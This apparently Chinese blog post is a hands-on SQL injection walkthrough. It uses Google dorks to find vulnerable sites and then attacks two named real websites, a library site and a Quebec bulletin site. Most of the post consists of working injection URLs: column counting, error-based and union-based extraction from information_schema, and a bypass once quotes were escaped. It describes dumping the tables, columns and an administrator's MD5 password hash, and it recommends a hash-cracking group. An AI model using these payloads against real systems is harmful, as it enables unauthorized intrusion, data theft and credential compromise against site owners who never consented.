sql注入实战
可以利用google的“inurl:”语法来找到一些url含参数的网站
示例:inurl:about.php?cartId=
分享一个Google搜素词典
可以用 or 1=1 和 and 1=2 来测是网站是否含有SQL注入漏洞
实例
网站 http://www.edgartownlibrary.org/article.php?id=41
wowo主要是介绍图书馆的文章
http://www.edgartownlibrary.org/article.php?id=41‘ 网页直接报错
order by 确定字段数
http://www.edgartownlibrary.org/article.php?id=41%20order%20by%204%23
确定字段数为4
爆数据库
尝试了联合注入 但是报错 于是采用报错注入
http://www.edgartownlibrary.org/article.php?id=41%20or%20extractvalue(1,concat(%27~%27,(select%20group_concat(database())),%27-%27))
依次爆出其特数据即可
第二个网站
网址:
存在注入漏洞
order by 确定字段数
http://strategiessl.qc.ca/bulletin/archive.php?id=274%20order%20by%206%23
确定字段数为6
联合注入爆数据库
http://strategiessl.qc.ca/bulletin/archive.php?id=274%20union%20select%201,database(),3,4,5,6%20%23
接下来是关键
爆数据表
http://strategiessl.qc.ca/bulletin/archive.php?id=274%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema=%27strate_infolettre%27%23
单引号被转义
在sql-labs中我们知道可以用 宽字节注入 来吃掉‘ \ ’,宽字节注入依靠的是中文gbk编码,但是此网站是加拿大的 所以没有采用gbk编码 宽字节注入也就失效了
由于单引号的问题 无法继续爆数据表;
这里我尝试了多次 乱写的代码竟然绕过了(手动滑稽)
代码:id=274%20union%20select%201,group_concat(column_name),3,4,5,6%20from%20information_schema.columns%20where%20table_name=(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1)
爆出的数据展示
这里管理员的密码采取了MD5加密 而MD5加密具有不可逆性 所以只能依靠随机碰撞来猜测密码 10位以内的密码有很高的概率可以解开 但我没有到可以解密的工具 顺便给大家推荐个MD5解密群,希望可以帮到大家。